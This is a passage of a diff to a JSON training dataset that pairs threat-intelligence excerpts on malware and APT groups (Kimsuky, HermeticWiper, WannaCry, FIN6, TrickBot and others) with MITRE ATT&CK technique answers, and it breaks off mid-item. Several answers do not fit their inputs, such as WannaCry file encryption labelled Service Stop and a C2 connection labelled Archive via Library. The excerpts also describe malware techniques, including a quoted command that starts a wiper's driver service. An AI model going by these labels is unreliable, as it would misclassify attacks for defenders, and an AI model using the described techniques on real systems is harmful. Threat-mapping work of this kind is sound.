service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Among infostealers used by the Kimsuky group, some samples have been found that use FTP to download additional malware after logging infected targets to the C&C [14, 15", + "output": "- T1071.002: Application Layer Protocol - File Transfer Protocols\n- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Win32CmDll.dll first tries to inject the ManagerMain and GuardClient modules into a process with one of the following names: lsass.exe, wininit.exe or lsm.exe. If that fails, it tries to inject into one of the registered windows services processes, excluding processes named spoolsv.exe, ekrn.exe (ESET), avp.exe (Kaspersky) or dllhost.exe. As a last option, if everything else failed, it tries to use the processes taskhost.exe, taskhostw.exe or explorer.exe", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We have most definitely observed Kimsuky targeting specific individuals \u2014 in fact, up to the present moment \u2014 even going as far as registering Internet domains containing the individual targets' names, the PwC analyst said", + "output": "- T1583.001: Acquire Infrastructure - Domains" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Along the way, HermeticWiper\u2019s more mundane operations provide us with further IOCs to monitor for. It also modifies several registry keys, including setting the SYSTEM\\CurrentControlSet\\Control\\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver\u2019s execution starts", + "output": "- T1112: Modify Registry\n- T1562.006: Impair Defenses - Indicator Blocking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TClient will use SSL to connect to Tropic Trooper\u2019s C&C server. This allows Tropic Trooper\u2019s operators to easily change/update the C&C server and configure other values", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CTU researchers assess with high confidence that IRON RITUAL's intent is long term, covert access to networks of interest for the purposes of espionage and data theft.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Each targeted file is opened, read, encrypted in memory, and then written to a new file in the malware\u2019s working directory using the filename format <random number>.WNCRYT. The files are then renamed to their original filename followed by the .WINCRY extension and moved to their original directory. The taskdl.exe process launched by the malware periodically deletes the remaining WINCRYT temporary files. The encryption process does not directly overwrite file data, so forensic recovery of file contents may be possible depending on the environment. The entire contents of the file are encrypted and saved with a custom header (see Figure 7", + "output": "- T1489: Service Stop" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Next, BoomBox AES-encrypts the host information string above using the hardcoded encryption key \u201c123do3y4r378o5t34onf7t3o573tfo73\u201d and initialization vector (IV) value \u201c1233t04p7jn3n4rg\u201d. To masquerade the data as contents of a PDF file, BoomBox prepends and appends the magic markers for PDF to the AES-encrypted host information string above", + "output": "- T1027: Obfuscated Files or Information\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For example, Monash University, located in Australia, has been a popular Silent Librarian target. Like the overall content of their lures, the subject lines of Silent Librarian phishing emails have remained consistent over time. Phishing Pages . We have identified 127 different domains used to host Silent Librarian phishing sites since 2013. Like a growing number of phishing sites, domains registered by Silent Librarian generally use Freenom top-level domains (TLDs) (.TK, . CF, .GA, .GQ, .ML) because they are available at no cost. Some of the other recent TLDs associated with Silent Librarian domains include .IN, .IR, .INFO, .LINK, and .TOP. Legitimate American\u00a0University Library Login URL (above) . Silent Librarian Phishing URL (January 2018) . The content of Silent Librarian phishing pages is almost identical to the legitimate target sites. The actors likely scrape the original HTML source code from the legitimate library login page, then edit the references to resources used to render the webpage (images, JavaScript, CSS, etc. An analysis of the Silent Librarian kits identified two email accounts that were used to receive compromised victim credentials. Similarly, the credentials stolen in the Silent Librarian phishing attacks we identified were sold on an Iranian website; however, it is not one of the sites specified in the indictment. Using a combination of technical and open source research, we identified another website, Uniaccount[.]ir, that was used to sell the credentials compromised in the Silent Librarian phishing attacks", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The use of an initial reconnaissance document allows Inception to profile the target\u2019s computer and potentially customize any subsequent malicious document to exploit known vulnerabilities in unpatched software on the computer", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The backdoor installer will drop a normal sidebar.exe file (a Windows Gadget tool, a feature already discontinued by Windows), a malicious loader (in \"\"C:\\ProgramData\\Apple\\Update\\wab32res.dll\"\"), and an encrypted configuration file\"", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Spear phishing, including the use of probably compromised email accounts. Lure documents using CVE-2017-11882 to drop malware. Stolen code signing certificates used to sign malware. Use of bitsadmin.exe to download additional tools. Use of PowerShell to download additional tools. Using C:\\Windows\\Debug and C:\\Perflogs as staging directories. Using Windows Management Instrumentation (WMI) for persistence. Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence", + "output": "- T1553.002: Subvert Trust Controls - Code Signing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the configuration is parsed, Cardinal RAT will proceed with making attempts at connecting with the C2. Using an example request and response from a C2 server, we can see how this traffic is configured", + "output": "- T1560.002: Archive Collected Data - Archive via Library" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN6 also moved laterally to servers in the environment using RDP and configured them as malware \u201cdistribution\u201d servers. Mandiant identified a utility script named kill.bat that was run on systems in the environment. FIN6 automated the deployment of kill.bat and the LockerGoga ransomware using batch script files. FIN6 created a number of BAT files on the malware distribution servers with the naming convention xaa.bat, xab.bat, xac.bat, etc. FIN6 renamed the psexec service name to \u201cmstdc\u201d in order to masquerade as the legitimate Windows executable \u201cmsdtc. Domain administrators have complete control over Windows systems in an Active Directory environment", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first stage implant that is nested in the DOTM file, is using triple base64 encoding in the Visual Basic Macro - The extracted DLL (desktop.dat) is packed with the Themida packer attempting to make analysis more difficult", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Use command-line interfaces to interact with systems and execute other software (Command and Scripting Interpreter [T1059]) - Use scripts (e.g. VBScript and PowerShell) to speed up operational tasks, reduce the time required to gain access to critical resources, and bypass process monitoring mechanisms by directly interacting with the operating system (OS) at an Application Programming Interface (API) level instead of calling other programs (Command and Scripting Interpreter: PowerShell [T1059.001], Command and Scripting Interpreter: Visual Basic [T1059.005]) - Rely upon specific user actions, such as opening a malicious email attachment (User Execution [T1204]) - Exploit software vulnerabilities to execute code on a system (Exploitation for Client Execution [T1203]) - Create new services or modify existing services to execute executables, commands, or scripts (System Services: Service Execution [T1569.002]) - Employ the Windows module loader to load Dynamic Link Libraries (DLLs) from arbitrary local paths or arbitrary Universal Naming Convention (UNC) network paths and execute arbitrary code on a system (Shared Modules [T1129]) - Use the Windows API to execute arbitrary code on the victim's system (Native API [T1106]) - Use a system's graphical user interface (GUI) to search for information and execute files (Remote Services [T1021]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053]) - Abuse compiled Hypertext Markup Language (HTML) files (.chm), commonly distributed as part of the Microsoft HTML Help system, to conceal malicious code (Signed Binary Proxy Execution: Compiled HTML File [T1218.001]) - Abuse Windows rundll32.exe to execute binaries, scripts, and Control Panel Item files (.CPL) and execute code via proxy to avoid triggering security tools (Signed Binary Proxy Execution: Rundl32 [T1218.001]) - Exploit cron in Linux and launchd in macOS systems to create pre-scheduled and periodic background jobs (Scheduled Task/Job: Cron [T1053.003], Scheduled Task/Job: Launchd [T1053.004", + "output": "- T1218.011: System Binary Proxy Execution - Rundll32\n- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1106: Native API\n- T1059.005: Command and Scripting Interpreter - Visual Basic\n- T1053.003: Scheduled Task/Job - Cron" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To decrypt the configuration data, the malware uses XOR with 25-character keys such as \u201cwaEHleblxiQjoxFJQaIMLdHKz\u201d that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value\u2019s MD5 hash as an initial vector. Among all these random keys once the word \u201csalamati\u201d was also used, which means \u201chealth\u201d in Farsi", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Every time the malware runs a command using cmd.exe, the standard output (STDOUT) of the executed command is piped and written to a Google Drive account with the following filename format", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "shareDll, mshareDll, tshareDll Modules used to propagate Trickbot loader to connected network shares of the victimized machine. Modules used to propagate Trickbot loader to connected network shares of the victimized machine. wormwinDll, wormDll, mwormDll, nwormDll Modules used for spreading inside a local network of compromised machines via SMB. Modules used for spreading inside a local network of compromised machines via SMB. tabDll Module used to spread into the network using the EternalRomance exploit. Module used to spread into the network using the EternalRomance exploit", + "output": "- T1135: Network Share Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The location of the working directory is determined by the instructions from the remote server. The directory is used as temporary storage for files containing collected data about the compromised computer", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The winupdate.ps1 script (SHA256: 36862f654c3356d2177b5d35a410c78ff9803d1d7d20da0b82e3d69d640e856e) is the main payload of this attack that we call RogueRobin. Its developer used the open source Invoke-Obfuscation tool to obfuscate this PowerShell script, specifically using the COMPRESS technique offered by Invoke-Obfuscation. Before carrying out any of its functionality the payload checks to see if it is executing in a sandbox. The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment. The specific sandbox checks include", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1047: Windows Management Instrumentation\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware used in a DUBNIUM attack is committed to disguising itself as Secure Shell (SSH) tool. The file descriptions and other properties of the malware look convincingly legitimate at first glance", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware next sets out to prevent the victim from stopping the ongoing infection. First, the machine is removed from the Active Directory domain by using WinAPI or WMI. This makes it harder to remotely push any remediation tools to the infected machines", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A macro is executed by the Office document: The macro inflates and creates a ZIP file on the targeted system and executes a Lua script in this archive. The archive contains the Lua payload and luajit, a Lua interpreter for Windows. Here is the script: This script downloads and executes an additional payload", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In some previous phishing email campaigns,\u00a0attackers leveraged SendGrid to distribute the initial emails to hide the Google Drive links in the documents behind a SendGrid URL as a way to bypass traditional defences", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In my opinion enumeration is not an attack technique that blue teamers should focus their defense efforts on. The best way to prevent unauthorized users from accessing this information is by having strict conditional access policies which govern how and from where users are allowed to use their Azure AD credentials. That being said, there is a setting in the deprecated MSOnline PowerShell module which prevents enumeration using the Azure AD graph, which is documented here. I haven\u2019t personally looked into bypassing this or if other functionality in Azure breaks if you enable this", + "output": "- T1078.004: Valid Accounts - Cloud Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The bot shows a number of similarities to Dyre but appears to have been rewritten. This assumption is made based on old Dyre code, which would primarily use built-in functions for doing things such as AES and SHA256 hashing. In the recent samples identifying themselves as TrickBot, the code appears to be based on that old code but rewritten to use things such as Microsoft CryptoAPI and COM", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Therefore, there is no centralized point of download. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine\"\" (Racicot\"", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HyperStack sets the registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA\\Restrict Anonymous value to 0 so anonymous logon users (i.e. null session connections) can list all account names and enumerate all shared resources on a remote share. The implant can then use the WNetAddConnection2 API call to connect to another remote device's IPC$ share. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stop the service COMSysApp - Configure the service to autostart (to set up persistence on the system) - Modify registry keys to launch the DLL unser svchost.exe - Specify the malicious DLL path to be loaded into the svchost process. Immediately restart the service - Remove the batch files to reduce the fingerprint on the system", + "output": "- T1055: Process Injection\n- T1070.004: Indicator Removal - File Deletion\n- T1112: Modify Registry\n- T1569.002: System Services - Service Execution\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The wiper module (SHA256: 391e7b90bf3f0bfeb2c2602cc65aa6be4dd1c01374b89c4a48425f2d22fe231c) that the dropper writes to the system is responsible for overwriting the data within the MBR, partitions, and files on the system. The wiper carries out this wiping using a legitimate hard disk driver called RawDisk by ElDos. The wiper contains the ElDos RawDisk driver in a resource named 'e' that it extracts by skipping to offset 1984 and reading 27792 bytes from that offset. It then decrypts the data using aa 247-byte key and saves it to \u2018%WINDOWS%\\system32\\hdv_725x.sys\u2019. The wiper then creates a service named \u2018hdv_725x\u2019 for this driver using the following command line command and runs it with \"\"sc start hdv_725x\"", + "output": "- T1485: Data Destruction" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While Diavol is not packed nor has any anti-disassembly tricks, it does use an interesting anti-analysis technique to obfuscate its code. Its main routines are kept in bitmap images, which are stored in the PE resource section. Before calling each routine, it copies the bytes from the bitmap to a global buffer that has execute permissions", + "output": "- T1106: Native API\n- T1027.003: Obfuscated Files or Information - Steganography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE 